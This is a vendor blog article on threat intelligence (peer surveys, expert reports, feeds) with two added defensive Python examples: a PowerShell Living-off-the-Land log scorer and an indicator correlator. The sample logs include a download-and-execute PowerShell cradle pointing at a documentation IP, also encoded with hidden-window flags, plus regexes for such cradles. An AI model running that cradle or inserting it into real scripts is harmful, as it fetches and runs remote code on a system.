By Anthony Giandomenico
Senior Security Strategist, Fortinet
As organizations continue to adopt and drive digital transformation (DX), staying ahead of the threat landscape and the evolving attack chain is becoming increasingly difficult. Today, rather than having a single network to secure, most organizations own and manage a variety of environments, including physical networks, private cloud and virtual SDN environments, multiple public clouds, an expanding WAN edge, converging IT and OT networks, and an increasingly mobile workforce.
This also includes ongoing DevOps application development, containerized environments, and the adoption of IaaS and SaaS solutions, including Shadow IT. And given the advent of more deeply integrated systems, such as smart cars, smart companies, and smart cities, along with the looming launch of 5G and the myriad new immersive applications and rich media sources that will result from it, the impact of DX seems to stretch out over the horizon.
Gathering and Maintaining Critical Threat Intelligence
Given the rate of change, where do you get access to reliable and actionable threat intelligence, especially when we seem overrun by a slew of quarterly, semi-annual, and annual threat reports, along with commissioned “studies” coming from every possible angle and vendor?
There are generally three kinds of threat intelligence.
Peer-based Threat Intelligence: The first, and most common, is based on a survey of security leaders or similar individuals that asks about the sorts of threats they have been experiencing. This sort of intelligence can be especially valuable if the people being interviewed operate within your industry or your geographic region. Keep in mind that survey data is self-reported and necessarily lags the events it describes, so it is context rather than something you can act on directly. An even more effective way to gather this sort of intelligence, however, is to subscribe to a threat rating service. These services, if provided by an organization with a global threat research footprint, can provide real-time insight into the state of security and the security challenges your peers are experiencing.
Expert-led Threat Reports: Threat intelligence needs not only to provide a historical review of the threat landscape but also to predict likely evolutionary points for malware and cybercriminal strategies, so that proper defenses can be established and maintained in a rapidly evolving threat landscape. If you are feeling overwhelmed by the amount of information being produced, start with threat reports produced by professional threat research teams. Here are a few examples, taken from the recent Fortinet Global Threat Landscape Report, of the kind of intelligence gathered by such teams that can be used to anticipate future attack strategies:
Attack models are increasingly incestuous: The degree to which different threats share infrastructure reveals some valuable trends. Some threats leverage community-use infrastructure to a greater degree than unique or dedicated infrastructure. Nearly 60% of threats shared at least one domain, indicating that the majority of botnets leverage established infrastructure. The practical upshot for defenders is that blocking or monitoring shared infrastructure pays off against several threats at once.
Attacks are becoming more customized: Threat developers are increasingly writing highly modular tools designed for specific attacks, such as proxies for large-scale network penetration. Likewise, custom ransomware is now being targeted at specific accounts that give the attacker privileged access to the network. LockerGoga's developers, for example, had researched their target's defenses so thoroughly that they determined their malware would not be detected, so they did not bother building in any evasion at all. As a result, defenses need to be raised around the data that can be leveraged to make an attack more effective, and critical accounts with privileged access need to be prioritized.
Cybercriminals are Targeting New Technologies: Adversaries tend to move from one opportunity to the next in clusters, targeting successfully exploited vulnerabilities and technologies that are on the upswing in order to maximize their return quickly. One example of a new technology getting a lot of attention from cybercriminals recently is the class of Web platforms that make it easier for consumers and businesses to build a Web presence. Both the platforms themselves and their associated third-party plugins continue to be targeted.
Growing Sophistication of Existing Malware: Cybercriminals are also abusing pre-installed tools (such as PowerShell), not only to make themselves harder to detect but also to spread more stealthily and do more damage. The Silence Group, for example, uses publicly available tools and utilities, combined with sophisticated “Living off the Land” (LoTL) strategies, to avoid detection. Securing, constraining, and logging the tools that enable LoTL strategies needs to be a priority for security teams.
The takeaway is that trends like these, which are easy to miss or overlook, play a critical role in enabling researchers not only to respond to current threats but also to predict threat behavior going forward. That information, in turn, enables security administrators to take proactive rather than reactive steps to protect their networks.
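As an added illustration of what "securing the tools that enable LoTL strategies" looks like on the detection side, the script below scores PowerShell invocations in process-creation logs for the generic warning signs a Living-off-the-Land attack chain tends to leave: an Office parent process, an encoded command (which it decodes and inspects), a hidden window, an execution-policy bypass, and download cradles. This is example code written for this article, not code from Fortinet or from any published Silence Group analysis. The log lines are constructed, the tab-separated layout (timestamp, host, user, parent process, command line) is an assumed normalized export rather than a real event format, and the weights are illustrative.

```python
"""Flag Living-off-the-Land style PowerShell use in process-creation logs.

Added example, not code from the original article, from Fortinet, or
from any published Silence Group analysis. The log lines are
constructed; the tab-separated layout (timestamp, host, user, parent
process, command line) is an assumed normalized export, not a real
event format. The heuristics are generic ones, not a signature for
any particular group, and the weights are illustrative.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# The encoded-command sample is built at import time so that it is a valid
# UTF-16LE/base64 payload of the kind PowerShell's -EncodedCommand expects.
_STAGE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
_ENCODED = base64.b64encode(_STAGE_CMD.encode("utf-16le")).decode("ascii")

# Constructed sample records: timestamp, host, user, parent, command line.
SAMPLE_LOG = (
    "2019-06-03T09:12:01Z\tWS-014\tjdoe\texplorer.exe\t"
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1\n"
    "2019-06-03T09:14:27Z\tWS-014\tjdoe\twinword.exe\t"
    f"powershell.exe -NoP -W Hidden -Enc {_ENCODED}\n"
    "2019-06-03T09:15:02Z\tSRV-DB01\tsvc_sql\tservices.exe\t"
    "powershell.exe -ExecutionPolicy Bypass -NoProfile "
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\n"
    "2019-06-03T09:20:44Z\tWS-022\tasmith\tcmd.exe\t"
    "powershell.exe Get-Process | Out-File C:\\temp\\procs.txt\n"
)

# Parents that rarely have a legitimate reason to launch PowerShell.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}
PARENT_WEIGHT = 3
ENCODED_WEIGHT = 2

# (indicator name, weight, pattern) applied to the raw and the decoded command line.
RULES = [
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("exec_policy_bypass", 1, re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I)),
    ("invoke_expression", 2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download_cradle", 3, re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)),
]
# -e, -enc and -EncodedCommand all take a base64 argument.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    host: str
    user: str
    parent: str
    cmdline: str
    indicators: list = field(default_factory=list)
    score: int = 0


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze(record):
    """Score one tab-separated process-creation record; None if not PowerShell."""
    parts = record.rstrip("\n").split("\t", 4)
    if len(parts) != 5:
        return None
    _ts, host, user, parent, cmdline = parts
    if "powershell" not in cmdline.lower():
        return None
    f = Finding(host, user, parent, cmdline)
    if parent.lower() in SUSPICIOUS_PARENTS:
        f.indicators.append("suspicious_parent")
        f.score += PARENT_WEIGHT
    texts = [("", cmdline)]
    if ENCODED_ARG.search(cmdline):
        f.indicators.append("encoded_command")
        f.score += ENCODED_WEIGHT
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            # Run the same rules over the decoded payload, tagged so the
            # analyst can see which layer fired.
            texts.append(("decoded:", decoded))
    for prefix, text in texts:
        for name, weight, pattern in RULES:
            if pattern.search(text):
                f.indicators.append(prefix + name)
                f.score += weight
    return f


def scan(log_text, threshold=1):
    """Return findings at or above threshold, highest score first."""
    findings = [analyze(line) for line in log_text.splitlines() if line.strip()]
    hits = [f for f in findings if f is not None and f.score >= threshold]
    return sorted(hits, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.score:2d} {hit.host:9s} {hit.parent:13s} {', '.join(hit.indicators)}")
```

The two benign records (a scheduled script run from explorer.exe and an interactive Get-Process) score zero and drop out, while the Word-spawned encoded command scores highest because the rules fire on both the raw line and the decoded payload. In practice the parent-process list and weights need tuning against your own baseline; an administrator's management scripts can legitimately use -NoProfile and -ExecutionPolicy Bypass.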
Threat Feeds and Internally Gathered Intelligence: In addition to these intelligence sources, security leaders need to subscribe to live threat feeds that provide robust and actionable indicators, as well as services that deliver real-time updates and recommendations from the cybersecurity front lines. Often, these resources are produced by the same organization that produces the quarterly or annual reports, which provides another clue as to which reports are likely to be the most valuable.
Threat feed and threat report intelligence needs to be combined with local data gathered from tools like sandboxes and SIEMs, and correlated through a common management, policy, and orchestration solution, to determine whether and how your organization has been exposed so that proper countermeasures and preparations can be made. That correlation only works if the local data is normalized to match the feed (domains lowercased with trailing dots removed, IP ranges expanded, hashes in a single case), so normalization belongs in the pipeline as well.
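To make the correlation step concrete, here is an added example (written for this article, not code from Fortinet or from any product) that matches a small threat feed against locally gathered DNS, proxy, firewall, and sandbox records and reports which hosts were exposed to which campaign. The feed entries and log lines are constructed: the domains use example.net, the addresses come from documentation ranges, the hash is computed from a fixed byte string, and the "source timestamp host key=value" layout is an assumed normalized SIEM export rather than a real format. The matching handles the normalization issues that bite in practice: case and trailing dots on domains, subdomains of a listed domain, ports on proxy destinations, CIDR ranges, and hash case.

```python
"""Correlate threat-feed indicators with locally gathered logs.

Added example, not code from the original article or from any Fortinet
product. The feed entries and log lines are constructed (documentation
IP ranges, example.net domains, a hash computed from a fixed byte
string); the "source timestamp host key=value" line layout is an
assumed normalized SIEM export, not a real product format.
"""
import hashlib
import ipaddress
from collections import defaultdict

SAMPLE_HASH = hashlib.sha256(b"constructed sample payload").hexdigest()

# Constructed threat feed: indicator type, value, and the campaign it belongs to.
# Feed domains should be real attacker domains, never bare TLDs, because
# matching is by suffix.
FEED = [
    {"type": "domain", "value": "Update-CDN.example.net", "threat": "botnet-A"},
    {"type": "ipv4", "value": "203.0.113.0/24", "threat": "botnet-A"},
    {"type": "ipv4", "value": "198.51.100.7", "threat": "loader-B"},
    {"type": "sha256", "value": SAMPLE_HASH, "threat": "ransomware-C"},
]

# Constructed local telemetry (DNS, proxy, firewall, sandbox verdicts)
# already normalized to "source timestamp host key=value".
SAMPLE_LOGS = f"""\
dns 2019-06-03T10:01:00Z WS-014 query=update-cdn.EXAMPLE.net.
dns 2019-06-03T10:01:05Z WS-014 query=intranet.example.org
proxy 2019-06-03T10:02:11Z SRV-DB01 dst=198.51.100.7:443
fw 2019-06-03T10:03:40Z WS-022 dst=203.0.113.45
dns 2019-06-03T10:04:02Z WS-031 query=cdn.update-cdn.example.net
sandbox 2019-06-03T10:05:19Z WS-030 sha256={SAMPLE_HASH.upper()}
fw 2019-06-03T10:06:00Z WS-040 dst=10.0.0.5
"""


def normalize_domain(name):
    """Lowercase and strip the trailing dot a DNS log often carries."""
    return name.strip().lower().rstrip(".")


class IndicatorSet:
    """Feed indicators indexed for fast lookup by type."""

    def __init__(self, feed):
        self.domains = {}
        self.networks = []
        self.hashes = {}
        for ioc in feed:
            if ioc["type"] == "domain":
                self.domains[normalize_domain(ioc["value"])] = ioc["threat"]
            elif ioc["type"] == "ipv4":
                # A single address becomes a /32; strict=False tolerates host bits.
                self.networks.append(
                    (ipaddress.ip_network(ioc["value"], strict=False), ioc["threat"]))
            elif ioc["type"] == "sha256":
                self.hashes[ioc["value"].lower()] = ioc["threat"]

    def match_domain(self, name):
        """Exact match, or the observed name is a subdomain of a feed domain."""
        labels = normalize_domain(name).split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            if candidate in self.domains:
                return candidate, self.domains[candidate]
        return None

    def match_ip(self, text):
        # Strip an IPv4 ":port" suffix; the sample contains no IPv6 literals.
        host = text.rsplit(":", 1)[0] if text.count(":") == 1 else text
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            return None
        for net, threat in self.networks:
            if addr in net:
                return str(net), threat
        return None

    def match_hash(self, digest):
        digest = digest.lower()
        return (digest, self.hashes[digest]) if digest in self.hashes else None


def correlate(log_text, iocs):
    """Return one match record per log line that hits a feed indicator."""
    matchers = {"query": iocs.match_domain, "dst": iocs.match_ip, "sha256": iocs.match_hash}
    matches = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or "=" not in parts[3]:
            continue
        source, _ts, host, kv = parts
        key, value = kv.split("=", 1)
        matcher = matchers.get(key)
        hit = matcher(value) if matcher else None
        if hit:
            indicator, threat = hit
            matches.append({"host": host, "source": source, "observed": value,
                            "indicator": indicator, "threat": threat})
    return matches


def exposure(matches):
    """Collapse matches into threat -> sorted list of affected hosts."""
    hosts = defaultdict(set)
    for m in matches:
        hosts[m["threat"]].add(m["host"])
    return {threat: sorted(h) for threat, h in hosts.items()}


if __name__ == "__main__":
    for threat, hosts in exposure(correlate(SAMPLE_LOGS, IndicatorSet(FEED))).items():
        print(f"{threat}: {', '.join(hosts)}")
```

Note how three of the five hits would be missed by a naive string comparison: the DNS query differs from the feed entry in case and trailing dot, the proxy destination carries a port, and the sandbox reports the hash in upper case. The subdomain match (WS-031) is deliberate, since attackers rotate hostnames under a controlled domain far more often than they change the domain itself; the flip side is that a feed entry consisting of a bare TLD or a shared hosting domain would match everything, so feed quality matters.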
Conclusion
Improving your organization's ability not only to defend itself against current threat trends but also to anticipate a broad range of future attacks requires threat intelligence that enables it to be proactive. This ability to “see the future” of threat trends allows organizations not only to defend more effectively against current attacks but also to prevent the next wave of attacks before it occurs.